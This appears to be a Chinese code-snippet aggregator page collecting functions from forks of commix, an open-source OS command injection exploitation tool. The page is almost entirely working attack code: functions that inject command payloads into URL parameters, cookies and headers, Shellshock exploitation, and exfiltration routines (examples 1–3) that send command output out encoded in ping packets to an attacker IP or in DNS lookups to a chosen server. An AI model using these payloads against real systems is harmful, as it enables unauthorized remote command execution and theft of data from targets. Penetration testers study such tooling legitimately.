当前位置: 首页>>代码示例>>Python>>正文


Python settings.print_payload函数代码示例

本文整理汇总了Python中src.utils.settings.print_payload函数的典型用法代码示例。如果您正苦于以下问题:Python print_payload函数的具体用法?Python print_payload怎么用?Python print_payload使用的例子?那么恭喜您, 这里精选的函数代码示例或许可以为您提供帮助。


在下文中一共展示了print_payload函数的15个代码示例,这些例子默认根据受欢迎程度排序。您可以为喜欢或者感觉有用的代码点赞,您的评价将有助于系统推荐出更棒的Python代码示例。

示例1: cmd_exec

def cmd_exec(http_request_method, cmd, url, vuln_parameter, ip_src):
  global add_new_line
  # ICMP exfiltration payload.
  payload = ("; " + cmd + " | xxd -p -c" + str(exfiltration_length) + " | while read line; do ping -p $line -c1 -s" + str(exfiltration_length * 2) + " -q " + ip_src + "; done")
  
  # Check if defined "--verbose" option.
  if settings.VERBOSITY_LEVEL >= 1:
    info_msg = "Executing the '" + cmd + "' command... "
    sys.stdout.write(settings.print_info_msg(info_msg))
    sys.stdout.flush()
    sys.stdout.write("\n" + settings.print_payload(payload) + "\n")

  if http_request_method == "GET":
    url = url.replace(settings.INJECT_TAG, "")
    data = payload.replace(" ", "%20")
    req = url + data
  else:
    values =  {vuln_parameter:payload}
    data = urllib.urlencode(values)
    req = urllib2.Request(url=url, data=data)

  try:
    sys.stdout.write(Fore.GREEN + Style.BRIGHT + "\n")
    response = urllib2.urlopen(req)
    time.sleep(3)
    sys.stdout.write(Style.RESET_ALL)
    if add_new_line:
      print "\n"
      add_new_line = True
    else:
      print ""
      
  except urllib2.HTTPError, err_msg:
    print settings.print_critical_msg(str(err_msg.code))
    raise SystemExit()
开发者ID:security-geeks,项目名称:commix,代码行数:35,代码来源:icmp_exfiltration.py

示例2: cmd_exec

def cmd_exec(dns_server, http_request_method, cmd, url, vuln_parameter):
  # DNS exfiltration payload.
  payload = ("; " + cmd + " | xxd -p -c 16 | while read line; do host $line.xxx " + dns_server + "; done")
  
  # Check if defined "--verbose" option.
  if settings.VERBOSITY_LEVEL >= 1:
    sys.stdout.write("\n" + settings.print_payload(payload))

  if http_request_method == "GET":
    url = url.replace(settings.INJECT_TAG, "")
    data = payload.replace(" ", "%20")
    req = url + data
  else:
    values =  {vuln_parameter:payload}
    data = urllib.urlencode(values)
    req = urllib2.Request(url=url, data=data)
    
  sys.stdout.write(Fore.GREEN + Style.BRIGHT + "\n")
  response = urllib2.urlopen(req)
  time.sleep(2)
  sys.stdout.write("\n" + Style.RESET_ALL)
开发者ID:aventado,项目名称:commix,代码行数:21,代码来源:dns_exfiltration.py

示例3: cmd_exec

def cmd_exec(http_request_method, cmd, url, vuln_parameter, ip_src):
  # ICMP exfiltration payload.
  payload = ("; " + cmd + " | xxd -p -c 16 | while read line; do ping -p $line -c 1 -s16 -q " + ip_src + "; done")
  
  # Check if defined "--verbose" option.
  if menu.options.verbose:
    sys.stdout.write("\n" + settings.print_payload(payload))

  if http_request_method == "GET":
    url = url.replace(settings.INJECT_TAG, "")
    data = payload.replace(" ", "%20")
    req = url + data
  else:
    values =  {vuln_parameter:payload}
    data = urllib.urlencode(values)
    req = urllib2.Request(url=url, data=data)
    
  sys.stdout.write(Fore.GREEN + Style.BRIGHT + "\n")
  response = urllib2.urlopen(req)
  time.sleep(2)
  sys.stdout.write("\n" + Style.RESET_ALL)
  print ""
开发者ID:ardiansn,项目名称:commix,代码行数:22,代码来源:icmp_exfiltration.py

示例4: check_for_shell

  def check_for_shell(url, cmd, cve, check_header, filename):
    try:

      TAG = ''.join(random.choice(string.ascii_uppercase) for i in range(6))
      cmd = "echo " + TAG + "$(" + cmd + ")" + TAG
      payload = shellshock_exploitation(cve, cmd)
      info_msg = "Executing the '" + cmd + "' command... "
      if settings.VERBOSITY_LEVEL == 1:
        sys.stdout.write(settings.print_info_msg(info_msg))
      elif settings.VERBOSITY_LEVEL > 1:
        sys.stdout.write(settings.print_info_msg(info_msg))
      sys.stdout.flush()
      if settings.VERBOSITY_LEVEL >= 1:
        sys.stdout.write("\n" + settings.print_payload(payload)+ "\n")

      header = {check_header : payload}
      request = urllib2.Request(url, None, header)
      if check_header == "User-Agent":
        menu.options.agent = payload
      else:
        menu.options.agent = default_user_agent
      log_http_headers.do_check(request)
      log_http_headers.check_http_traffic(request)
      # Check if defined any HTTP Proxy.
      if menu.options.proxy:
        response = proxy.use_proxy(request)
      # Check if defined Tor.
      elif menu.options.tor:
        response = tor.use_tor(request)
      else:
        response = urllib2.urlopen(request)
      shell = response.read().rstrip().replace('\n',' ')
      shell = re.findall(r"" + TAG + "(.*)" + TAG, shell)
      shell = ''.join(shell)
      return shell, payload

    except urllib2.URLError, err_msg:
      print "\n" + settings.print_critical_msg(err_msg)
      raise SystemExit()
开发者ID:security-geeks,项目名称:commix,代码行数:39,代码来源:shellshock.py

示例5: check_injection

  def check_injection(separator, payload, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename):
    
    # Execute shell commands on vulnerable host.
    if alter_shell :
      payload = fb_payloads.cmd_execution_alter_shell(separator, cmd, OUTPUT_TEXTFILE) 
    else:
      payload = fb_payloads.cmd_execution(separator, cmd, OUTPUT_TEXTFILE) 

    # Fix prefixes / suffixes
    payload = parameters.prefixes(payload, prefix)
    payload = parameters.suffixes(payload, suffix)

    # Whitespace fixation
    payload = payload.replace(" ", whitespace)

    # Perform payload modification
    payload = checks.perform_payload_modification(payload)

    # Check if defined "--verbose" option.
    if settings.VERBOSITY_LEVEL >= 1:
      payload_msg = payload.replace("\n", "\\n")
      if settings.COMMENT in payload_msg:
        payload = payload.split(settings.COMMENT)[0].strip()
        payload_msg = payload_msg.split(settings.COMMENT)[0].strip()
      info_msg = "Executing the '" + cmd.split(settings.COMMENT)[0].strip() + "' command... "
      sys.stdout.write(settings.print_info_msg(info_msg))
      sys.stdout.flush()
      output_payload = "\n" + settings.print_payload(payload)
      if settings.VERBOSITY_LEVEL >= 1:
        output_payload = output_payload + "\n" 
      sys.stdout.write(output_payload)

    # Check if defined cookie with "INJECT_HERE" tag
    if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
      response = cookie_injection_test(url, vuln_parameter, payload)

    # Check if defined user-agent with "INJECT_HERE" tag
    elif menu.options.agent and settings.INJECT_TAG in menu.options.agent:
      response = user_agent_injection_test(url, vuln_parameter, payload)
      
    # Check if defined referer with "INJECT_HERE" tag
    elif menu.options.referer and settings.INJECT_TAG in menu.options.referer:
      response = referer_injection_test(url, vuln_parameter, payload)

    # Check if defined host with "INJECT_HERE" tag
    elif menu.options.host and settings.INJECT_TAG in menu.options.host:
      response = host_injection_test(url, vuln_parameter, payload)

    # Check if defined custom header with "INJECT_HERE" tag
    elif settings.CUSTOM_HEADER_INJECTION:
      response = custom_header_injection_test(url, vuln_parameter, payload)

    else:
      # Check if defined method is GET (Default).
      if http_request_method == "GET":
        # Check if its not specified the 'INJECT_HERE' tag
        #url = parameters.do_GET_check(url)
        payload = payload.replace(" ","%20")
        target = url.replace(settings.INJECT_TAG, payload)
        vuln_parameter = ''.join(vuln_parameter)
        request = urllib2.Request(target)
        # Check if defined extra headers.
        headers.do_check(request)        
        # Get the response of the request
        response = requests.get_request_response(request) 

      else :
        # Check if defined method is POST.
        parameter = menu.options.data
        parameter = urllib2.unquote(parameter)
        # Check if its not specified the 'INJECT_HERE' tag
        parameter = parameters.do_POST_check(parameter)
        # Define the POST data  
        if settings.IS_JSON:
          payload = payload.replace("\"", "\\\"")
          data = parameter.replace(settings.INJECT_TAG, urllib.unquote(payload))
          try:
            data = json.loads(data, strict = False)
          except:
            pass
          request = urllib2.Request(url, json.dumps(data))
        else:
          if settings.IS_XML:
            data = parameter.replace(settings.INJECT_TAG, urllib.unquote(payload))  
          else:
            data = parameter.replace(settings.INJECT_TAG, payload)
          request = urllib2.Request(url, data)
          
        # Check if defined extra headers.
        headers.do_check(request)        
          
        # Get the response of the request
        response = requests.get_request_response(request)
    return response
开发者ID:security-geeks,项目名称:commix,代码行数:94,代码来源:fb_injector.py

示例6: tfb_injection_handler

def tfb_injection_handler(url, delay, filename, tmp_path, http_request_method, url_time_response):

  counter = 1
  num_of_chars = 1
  vp_flag = True
  no_result = True
  is_encoded = False
  possibly_vulnerable = False
  false_positive_warning = False
  how_long_statistic = []
  export_injection_info = False
  how_long = 0
  injection_type = "semi-blind command injection"
  technique = "tempfile-based injection technique"

  # Check if defined "--maxlen" option.
  if menu.options.maxlen:
    maxlen = settings.MAXLEN
    
  # Check if defined "--url-reload" option.
  if menu.options.url_reload == True:
    err_msg = "The '--url-reload' option is not available in " + technique + "!"
    print settings.print_critical_msg(err_msg)

  whitespace = checks.check_whitespaces()

  if settings.VERBOSITY_LEVEL >= 1:
    info_msg ="Testing the " + technique + "... "
    print settings.print_info_msg(info_msg)

  # Calculate all possible combinations
  total = (len(settings.PREFIXES) * len(settings.SEPARATORS) * len(settings.SUFFIXES) - len(settings.JUNK_COMBINATION))
    
  for prefix in settings.PREFIXES:
    for suffix in settings.SUFFIXES:
      for separator in settings.SEPARATORS:

        if settings.LOAD_SESSION:
          cmd = shell = ""
          url, technique, injection_type, separator, shell, vuln_parameter, prefix, suffix, TAG, alter_shell, payload, http_request_method, url_time_response, delay, how_long, output_length, is_vulnerable = session_handler.injection_point_exportation(url, http_request_method)
          checks.check_for_stored_tamper(payload)
          settings.FOUND_HOW_LONG = how_long
          settings.FOUND_DIFF = how_long - delay
          OUTPUT_TEXTFILE = tmp_path + TAG + ".txt"
          
        else:
          num_of_chars = num_of_chars + 1
          # Check for bad combination of prefix and separator
          combination = prefix + separator
          if combination in settings.JUNK_COMBINATION:
            prefix = ""

          # Change TAG on every request to prevent false-positive resutls.
          TAG = ''.join(random.choice(string.ascii_uppercase) for num_of_chars in range(6))  

          # The output file for file-based injection technique.
          OUTPUT_TEXTFILE = tmp_path + TAG + ".txt"
          alter_shell = menu.options.alter_shell
          tag_length = len(TAG) + 4
          
          for output_length in range(1, int(tag_length)):
            try:
              # Tempfile-based decision payload (check if host is vulnerable).
              if alter_shell :
                payload = tfb_payloads.decision_alter_shell(separator, output_length, TAG, OUTPUT_TEXTFILE, delay, http_request_method)
              else:
                payload = tfb_payloads.decision(separator, output_length, TAG, OUTPUT_TEXTFILE, delay, http_request_method)

              # Fix prefixes / suffixes
              payload = parameters.prefixes(payload, prefix)
              payload = parameters.suffixes(payload, suffix)

              # Whitespace fixation
              payload = re.sub(" ", whitespace, payload)
              
              # Encode payload to Base64
              if settings.TAMPER_SCRIPTS['base64encode']:
                from src.core.tamper import base64encode
                payload = base64encode.encode(payload)

              # Check if defined "--verbose" option.
              if settings.VERBOSITY_LEVEL >= 1:
                payload_msg = payload.replace("\n", "\\n")
                print settings.print_payload(payload_msg)
                  
              # Cookie Injection
              if settings.COOKIE_INJECTION == True:
                # Check if target host is vulnerable to cookie injection.
                vuln_parameter = parameters.specify_cookie_parameter(menu.options.cookie)
                how_long = tfb_injector.cookie_injection_test(url, vuln_parameter, payload)
                
              # User-Agent Injection
              elif settings.USER_AGENT_INJECTION == True:
                # Check if target host is vulnerable to user-agent injection.
                vuln_parameter = parameters.specify_user_agent_parameter(menu.options.agent)
                how_long = tfb_injector.user_agent_injection_test(url, vuln_parameter, payload)

              # Referer Injection
              elif settings.REFERER_INJECTION == True:
                # Check if target host is vulnerable to referer injection.
#.........这里部分代码省略.........
开发者ID:dtrip,项目名称:commix,代码行数:101,代码来源:tfb_handler.py

示例7: cb_injection_handler

def cb_injection_handler(url, timesec, filename, http_request_method):
  shell = False
  counter = 1
  vp_flag = True
  no_result = True
  is_encoded = False
  export_injection_info = False
  injection_type = "results-based OS command injection"
  technique = "classic command injection technique"

  if not settings.LOAD_SESSION: 
    info_msg = "Testing the " + "(" + injection_type.split(" ")[0] + ") " + technique + "... "
    sys.stdout.write(settings.print_info_msg(info_msg))
    sys.stdout.flush()
    if settings.VERBOSITY_LEVEL >= 1:
      print ""
      
  i = 0
  # Calculate all possible combinations
  total = len(settings.WHITESPACE) * len(settings.PREFIXES) * len(settings.SEPARATORS) * len(settings.SUFFIXES)
  for whitespace in settings.WHITESPACE:
    for prefix in settings.PREFIXES:
      for suffix in settings.SUFFIXES:
        for separator in settings.SEPARATORS:
          if whitespace == " ":
            whitespace = urllib.quote(whitespace) 
          # Check injection state
          settings.DETECTION_PHASE = True
          settings.EXPLOITATION_PHASE = False
          # If a previous session is available.
          if settings.LOAD_SESSION and session_handler.notification(url, technique, injection_type):
            try:
              settings.CLASSIC_STATE = True
              url, technique, injection_type, separator, shell, vuln_parameter, prefix, suffix, TAG, alter_shell, payload, http_request_method, url_time_response, timesec, how_long, output_length, is_vulnerable = session_handler.injection_point_exportation(url, http_request_method)
              checks.check_for_stored_tamper(payload)
            except TypeError:
              err_msg = "An error occurred while accessing session file ('"
              err_msg += settings.SESSION_FILE + "'). "
              err_msg += "Use the '--flush-session' option."
              print settings.print_critical_msg(err_msg)
              raise SystemExit()

          else:
            i = i + 1
            # Check for bad combination of prefix and separator
            combination = prefix + separator
            if combination in settings.JUNK_COMBINATION:
              prefix = ""

            # Change TAG on every request to prevent false-positive results.
            TAG = ''.join(random.choice(string.ascii_uppercase) for i in range(6)) 
            
            randv1 = random.randrange(100)
            randv2 = random.randrange(100)
            randvcalc = randv1 + randv2
            
            # Define alter shell
            alter_shell = menu.options.alter_shell
            
            try:
              if alter_shell:
                # Classic -alter shell- decision payload (check if host is vulnerable).
                payload = cb_payloads.decision_alter_shell(separator, TAG, randv1, randv2)
              else:
                # Classic decision payload (check if host is vulnerable).
                payload = cb_payloads.decision(separator, TAG, randv1, randv2)
              
              # Define prefixes & suffixes
              payload = parameters.prefixes(payload, prefix)
              payload = parameters.suffixes(payload, suffix)

              # Whitespace fixation
              payload = payload.replace(" ", whitespace)
              
              # Perform payload modification
              payload = checks.perform_payload_modification(payload)

              # Check if defined "--verbose" option.
              if settings.VERBOSITY_LEVEL == 1:
                print settings.print_payload(payload)
              elif settings.VERBOSITY_LEVEL > 1:
                info_msg = "Generating a payload for injection..."
                print settings.print_info_msg(info_msg)
                print settings.print_payload(payload) 
                
              # Cookie header injection
              if settings.COOKIE_INJECTION == True:
                # Check if target host is vulnerable to cookie header injection.
                vuln_parameter = parameters.specify_cookie_parameter(menu.options.cookie)
                response = cb_injector.cookie_injection_test(url, vuln_parameter, payload)
                
              # User-Agent HTTP header injection
              elif settings.USER_AGENT_INJECTION == True:
                # Check if target host is vulnerable to user-agent HTTP header injection.
                vuln_parameter = parameters.specify_user_agent_parameter(menu.options.agent)
                response = cb_injector.user_agent_injection_test(url, vuln_parameter, payload)

              # Referer HTTP header injection
              elif settings.REFERER_INJECTION == True:
                # Check if target host is vulnerable to referer HTTP header injection.
#.........这里部分代码省略.........
开发者ID:security-geeks,项目名称:commix,代码行数:101,代码来源:cb_handler.py

示例8: check_injection

  def check_injection(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename):
    # Execute shell commands on vulnerable host.
    if alter_shell:
      payload = eb_payloads.cmd_execution_alter_shell(separator, TAG, cmd)
    else:
      payload = eb_payloads.cmd_execution(separator, TAG, cmd)

    # Fix prefixes / suffixes
    payload = parameters.prefixes(payload, prefix)
    payload = parameters.suffixes(payload, suffix)
    # Fixation for specific payload.
    if ")%3B" + urllib.quote(")}") in payload:
      payload = payload.replace(")%3B" + urllib.quote(")}"), ")" + urllib.quote(")}"))

    # Whitespace fixation
    payload = re.sub(" ", whitespace, payload)

    if settings.TAMPER_SCRIPTS['base64encode']:
      from src.core.tamper import base64encode
      payload = base64encode.encode(payload)

    # Check if defined "--verbose" option.
    if settings.VERBOSITY_LEVEL >= 1:
      info_msg = "Executing the '" + cmd + "' command: "
      sys.stdout.write("\n" + settings.print_info_msg(info_msg))
      sys.stdout.flush()
      sys.stdout.write("\n" + settings.print_payload(payload) + "\n")

    # Check if defined cookie with "INJECT_HERE" tag
    if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
      response = cookie_injection_test(url, vuln_parameter, payload)

     # Check if defined user-agent with "INJECT_HERE" tag
    elif menu.options.agent and settings.INJECT_TAG in menu.options.agent:
      response = user_agent_injection_test(url, vuln_parameter, payload)

    # Check if defined referer with "INJECT_HERE" tag
    elif menu.options.referer and settings.INJECT_TAG in menu.options.referer:
      response = referer_injection_test(url, vuln_parameter, payload)

    # Check if defined custom header with "INJECT_HERE" tag
    elif settings.CUSTOM_HEADER_INJECTION:
      response = custom_header_injection_test(url, vuln_parameter, payload)

    else:
      # Check if defined method is GET (Default).
      if http_request_method == "GET":
        # Check if its not specified the 'INJECT_HERE' tag
        #url = parameters.do_GET_check(url)
        
        target = re.sub(settings.INJECT_TAG, payload, url)
        vuln_parameter = ''.join(vuln_parameter)
        request = urllib2.Request(target)
        
        # Check if defined extra headers.
        headers.do_check(request)  

        # Get the response of the request
        response = requests.get_request_response(request)
       
      else :
        # Check if defined method is POST.
        parameter = menu.options.data
        parameter = urllib2.unquote(parameter)
        
        # Check if its not specified the 'INJECT_HERE' tag
        parameter = parameters.do_POST_check(parameter)
        parameter = parameter.replace("+","%2B")
        
        # Define the POST data   
        if settings.IS_JSON == False:
          data = re.sub(settings.INJECT_TAG, payload, parameter)
          request = urllib2.Request(url, data)
        else:
          payload = payload.replace("\"", "\\\"")
          data = re.sub(settings.INJECT_TAG, urllib.unquote(payload), parameter)
          data = json.loads(data, strict = False)
          request = urllib2.Request(url, json.dumps(data))
        
        # Check if defined extra headers.
        headers.do_check(request)

        # Get the response of the request
        response = requests.get_request_response(request)

    return response
开发者ID:BMaChina,项目名称:commix,代码行数:86,代码来源:eb_injector.py

示例9: shellshock_handler

def shellshock_handler(url, http_request_method, filename):

  counter = 1
  vp_flag = True
  no_result = True
  export_injection_info = False

  injection_type = "results-based command injection"
  technique = "shellshock injection technique"

  info_msg = "Testing the " + technique + "... "
  sys.stdout.write(settings.print_info_msg(info_msg))
  sys.stdout.flush()

  try: 
    i = 0
    total = len(shellshock_cves) * len(headers)
    for cve in shellshock_cves:
      for check_header in headers:
        i = i + 1
        attack_vector = "echo " + cve + ":Done;"
        payload = shellshock_payloads(cve, attack_vector)

        # Check if defined "--verbose" option.
        if menu.options.verbose:
          sys.stdout.write("\n" + settings.print_payload(payload))

        header = {check_header : payload}
        request = urllib2.Request(url, None, header)
        response = urllib2.urlopen(request)

        if not menu.options.verbose:
          percent = ((i*100)/total)
          float_percent = "{0:.1f}".format(round(((i*100)/(total*1.0)),2))
          
          if str(float_percent) == "100.0":
            if no_result == True:
              percent = Fore.RED + "FAILED" + Style.RESET_ALL
            else:
              percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL
          elif cve in response.info():
            percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL
          else:
            percent = str(float_percent )+ "%"

          info_msg = "Testing the " + technique + "... " +  "[ " + percent + " ]"
          sys.stdout.write("\r" + settings.print_info_msg(info_msg))
          sys.stdout.flush()

          # Print the findings to log file.
          if export_injection_info == False:
            export_injection_info = logs.add_type_and_technique(export_injection_info, filename, injection_type, technique)
          if vp_flag == True:
            vuln_parameter = "HTTP Header"
            vp_flag = logs.add_parameter(vp_flag, filename, check_header, vuln_parameter, payload)
          logs.update_payload(filename, counter, payload) 

        if cve in response.info():
          no_result = False
          success_msg = "The (" + check_header + ") '" + Style.UNDERLINE 
          success_msg += url + Style.RESET_ALL + Style.BRIGHT + "' is vulnerable to " + injection_type + "."
          print "\n" + settings.print_success_msg(success_msg)
          print "  (+) Type : " + Fore.YELLOW + Style.BRIGHT + injection_type.title() + Style.RESET_ALL + ""
          print "  (+) Technique : " + Fore.YELLOW + Style.BRIGHT + technique.title() + Style.RESET_ALL + ""
          print "  (+) Payload : " + Fore.YELLOW + Style.BRIGHT + "\"" + payload + "\"" + Style.RESET_ALL
          if not menu.options.verbose:
            print ""
          # Enumeration options.
          if settings.ENUMERATION_DONE == True :
            if menu.options.verbose:
              print ""
            while True:
              question_msg = "Do you want to enumerate again? [Y/n/q] > "
              enumerate_again = raw_input(settings.print_question_msg(question_msg)).lower()
              if enumerate_again in settings.CHOICE_YES:
                enumeration(url, cve, check_header, filename)
                break
              elif enumerate_again in settings.CHOICE_NO: 
                break
              elif enumerate_again in settings.CHOICE_QUIT:
                sys.exit(0)
              else:
                if enumerate_again == "":
                  enumerate_again = "enter"
                err_msg = "'" + enumerate_again + "' is not a valid answer."  
                print settings.print_error_msg(err_msg) + "\n"
                pass
          else:
            enumeration(url, cve, check_header, filename)

          # File access options.
          if settings.FILE_ACCESS_DONE == True :
            while True:
              question_msg = "Do you want to access files again? [Y/n/q] > "
              file_access_again = raw_input(settings.print_question_msg(question_msg)).lower()
              if file_access_again in settings.CHOICE_YES:
                file_access(url, cve, check_header, filename)
                break
              elif file_access_again in settings.CHOICE_NO: 
                break
#.........这里部分代码省略.........
开发者ID:ardiansn,项目名称:commix,代码行数:101,代码来源:shellshock.py

示例10: check_for_shell

      header = { check_header : payload }
      request = urllib2.Request(url, None, header)
      response = urllib2.urlopen(request)
      shell = response.read().rstrip()
      return shell, payload

    except urllib2.URLError, err_msg:
      print "\n" + settings.print_error_msg(err_msg)
      sys.exit(0)

  shell, payload = check_for_shell(url, cmd, cve, check_header, filename)
  if len(shell) == 0:
    cmd = "/bin/" + cmd
    shell, payload = check_for_shell(url, cmd, cve, check_header, filename)
    if menu.options.verbose and len(shell) > 0:
      sys.stdout.write("\n" + settings.print_payload(payload))
    if len(shell) == 0:
      cmd = "/usr" + cmd
      shell, payload = check_for_shell(url, cmd, cve, check_header, filename)
      if menu.options.verbose and len(shell) > 0:
        sys.stdout.write("\n" + settings.print_payload(payload))

  return shell, payload

"""
The exploitation function.
(call the injection handler)
"""
def exploitation(url, http_request_method, filename):       
  if shellshock_handler(url, http_request_method, filename) == False:
    return False
开发者ID:ardiansn,项目名称:commix,代码行数:31,代码来源:shellshock.py

示例11: fb_injection_handler

def fb_injection_handler(url, timesec, filename, http_request_method, url_time_response):
  shell = False
  counter = 1
  vp_flag = True
  exit_loops = False
  no_result = True
  is_encoded = False
  stop_injection = False
  call_tmp_based = False
  next_attack_vector = False
  export_injection_info = False
  injection_type = "semi-blind command injection"
  technique = "file-based command injection technique"

  tmp_path = check_tmp_path(url, timesec, filename, http_request_method, url_time_response)

  if not settings.LOAD_SESSION or settings.RETEST == True: 
    TAG = ''.join(random.choice(string.ascii_uppercase) for i in range(6)) 
    info_msg = "Trying to create a file in '" + settings.WEB_ROOT 
    info_msg += "' for command execution results... "
    print settings.print_info_msg(info_msg)

  i = 0
  # Calculate all possible combinations
  total = len(settings.WHITESPACE) * len(settings.PREFIXES) * len(settings.SEPARATORS) * len(settings.SUFFIXES)
  # Check if defined alter shell
  alter_shell = menu.options.alter_shell
  for whitespace in settings.WHITESPACE:
    for prefix in settings.PREFIXES:
      for suffix in settings.SUFFIXES:
        for separator in settings.SEPARATORS:

          # Check injection state
          settings.DETECTION_PHASE = True
          settings.EXPLOITATION_PHASE = False
          # If a previous session is available.
          if settings.LOAD_SESSION:
            try:
              settings.FILE_BASED_STATE = True
              url, technique, injection_type, separator, shell, vuln_parameter, prefix, suffix, TAG, alter_shell, payload, http_request_method, url_time_response, timesec, how_long, output_length, is_vulnerable = session_handler.injection_point_exportation(url, http_request_method)
              checks.check_for_stored_tamper(payload)
              OUTPUT_TEXTFILE = TAG + ".txt"
              session_handler.notification(url, technique, injection_type)
              if technique == "tempfile-based injection technique":
                #settings.LOAD_SESSION = True
                tfb_handler.exploitation(url, timesec, filename, tmp_path, http_request_method, url_time_response)
            except TypeError:
              err_msg = "An error occurred while accessing session file ('"
              err_msg += settings.SESSION_FILE + "'). "
              err_msg += "Use the '--flush-session' option."
              print settings.print_critical_msg(err_msg)
              raise SystemExit()

          if settings.RETEST == True:
            settings.RETEST = False
            from src.core.injections.results_based.techniques.classic import cb_handler
            cb_handler.exploitation(url, timesec, filename, http_request_method)
   
          if not settings.LOAD_SESSION:
            i = i + 1
            # The output file for file-based injection technique.
            OUTPUT_TEXTFILE = TAG + ".txt"    
            # Check for bad combination of prefix and separator
            combination = prefix + separator
            if combination in settings.JUNK_COMBINATION:
              prefix = ""

            try:
              # File-based decision payload (check if host is vulnerable).
              if alter_shell :
                payload = fb_payloads.decision_alter_shell(separator, TAG, OUTPUT_TEXTFILE)
              else:
                payload = fb_payloads.decision(separator, TAG, OUTPUT_TEXTFILE)
                      
              # Check if defined "--prefix" option.
              # Fix prefixes / suffixes
              payload = parameters.prefixes(payload, prefix)
              payload = parameters.suffixes(payload, suffix)

              # Whitespace fixation
              payload = payload.replace(" ", whitespace)

              # Perform payload modification
              payload = checks.perform_payload_modification(payload)

              # Check if defined "--verbose" option.
              if settings.VERBOSITY_LEVEL == 1:
                payload_msg = payload.replace("\n", "\\n")
                print settings.print_payload(payload_msg)
              # Check if defined "--verbose" option.
              elif settings.VERBOSITY_LEVEL > 1:
                info_msg = "Generating a payload for injection..."
                print settings.print_info_msg(info_msg)
                print settings.print_payload(payload) 

              # Cookie Injection
              if settings.COOKIE_INJECTION == True:
                # Check if target host is vulnerable to cookie header injection.
                vuln_parameter = parameters.specify_cookie_parameter(menu.options.cookie)
                response = fb_injector.cookie_injection_test(url, vuln_parameter, payload)
#.........这里部分代码省略.........
开发者ID:security-geeks,项目名称:commix,代码行数:101,代码来源:fb_handler.py

示例12: false_positive_check

def false_positive_check(separator, TAG, cmd, prefix, suffix, whitespace, delay, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, randvcalc, alter_shell, how_long, url_time_response):

  found_chars = False
  if settings.VERBOSITY_LEVEL >= 1: 
    info_msg = "Testing the reliability of used payload... "
    sys.stdout.write(settings.print_info_msg(info_msg))
    sys.stdout.flush()  

  for output_length in range(1, 3):

    # Execute shell commands on vulnerable host.
    if alter_shell :
      payload = tfb_payloads.cmd_execution_alter_shell(separator, cmd, output_length, OUTPUT_TEXTFILE, delay, http_request_method)
    else:
      payload = tfb_payloads.cmd_execution(separator, cmd, output_length, OUTPUT_TEXTFILE, delay, http_request_method)

    # Fix prefixes / suffixes
    payload = parameters.prefixes(payload, prefix)
    payload = parameters.suffixes(payload, suffix)

    # Whitespace fixation
    payload = re.sub(" ", whitespace, payload)

    if settings.TAMPER_SCRIPTS['base64encode']:
      payload = base64.b64encode(payload)

    # Check if defined "--verbose" option.
    if settings.VERBOSITY_LEVEL >= 1:
      payload_msg = payload.replace("\n", "\\n") 
      sys.stdout.write("\n" + settings.print_payload(payload_msg))
 
    # Check if defined cookie with "INJECT_HERE" tag
    if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
      how_long = cookie_injection_test(url, vuln_parameter, payload)

    # Check if defined user-agent with "INJECT_HERE" tag
    elif menu.options.agent and settings.INJECT_TAG in menu.options.agent:
      how_long = user_agent_injection_test(url, vuln_parameter, payload)

    # Check if defined referer with "INJECT_HERE" tag
    elif menu.options.referer and settings.INJECT_TAG in menu.options.referer:
      how_long = referer_injection_test(url, vuln_parameter, payload)

    # Check if defined custom header with "INJECT_HERE" tag
    elif settings.CUSTOM_HEADER_INJECTION:
      how_long = custom_header_injection_test(url, vuln_parameter, payload)

    else:
      how_long = examine_requests(payload, vuln_parameter, http_request_method, url, delay, url_time_response)

    if (how_long >= settings.FOUND_HOW_LONG) and (how_long - delay >= settings.FOUND_DIFF):
      found_chars = True
      break

  if found_chars == True :
    num_of_chars = output_length + 1
    check_start = 0
    check_end = 0
    check_start = time.time()
    
    output = [] 
    percent = 0
    for num_of_chars in range(1, int(num_of_chars)):
      for ascii_char in range(1, 3):
 
        # Get the execution ouput, of shell execution.
        if alter_shell:
          payload = tfb_payloads.fp_result_alter_shell(separator, OUTPUT_TEXTFILE, num_of_chars, ascii_char, delay, http_request_method)
        else:
          payload = tfb_payloads.fp_result(separator, OUTPUT_TEXTFILE, ascii_char, delay, http_request_method)

        # Fix prefixes / suffixes
        payload = parameters.prefixes(payload, prefix)
        payload = parameters.suffixes(payload, suffix)        

        # Whitespace fixation
        payload = re.sub(" ", whitespace, payload)

        if settings.TAMPER_SCRIPTS['base64encode']:
          payload = base64.b64encode(payload)

        # Check if defined "--verbose" option.
        if settings.VERBOSITY_LEVEL >= 1:
          payload_msg = payload.replace("\n", "\\n") 
          sys.stdout.write("\n" + settings.print_payload(payload_msg))

        # Check if defined cookie with "INJECT_HERE" tag
        if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
          how_long = cookie_injection_test(url, vuln_parameter, payload)

        # Check if defined user-agent with "INJECT_HERE" tag
        elif menu.options.agent and settings.INJECT_TAG in menu.options.agent:
          how_long = user_agent_injection_test(url, vuln_parameter, payload)

        # Check if defined referer with "INJECT_HERE" tag
        elif menu.options.referer and settings.INJECT_TAG in menu.options.referer:
          how_long = referer_injection_test(url, vuln_parameter, payload)

        # Check if defined custom header with "INJECT_HERE" tag
        elif settings.CUSTOM_HEADER_INJECTION:
#.........这里部分代码省略.........
开发者ID:BMaChina,项目名称:commix,代码行数:101,代码来源:tfb_injector.py

示例13: eb_injection_handler

def eb_injection_handler(url, delay, filename, http_request_method):

  counter = 1
  vp_flag = True
  no_result = True
  export_injection_info = False
  injection_type = "Results-based Command Injection"
  technique = "eval-based code injection technique"

  for item in range(0, len(settings.EXECUTION_FUNCTIONS)):
    settings.EXECUTION_FUNCTIONS[item] = "${" + settings.EXECUTION_FUNCTIONS[item] + "("
  settings.EVAL_PREFIXES = settings.EVAL_PREFIXES + settings.EXECUTION_FUNCTIONS

  url = eb_injector.warning_detection(url, http_request_method)
  
  if not settings.LOAD_SESSION:
    info_msg = "Testing the " + technique + "... "
    sys.stdout.write(settings.print_info_msg(info_msg))
    sys.stdout.flush()

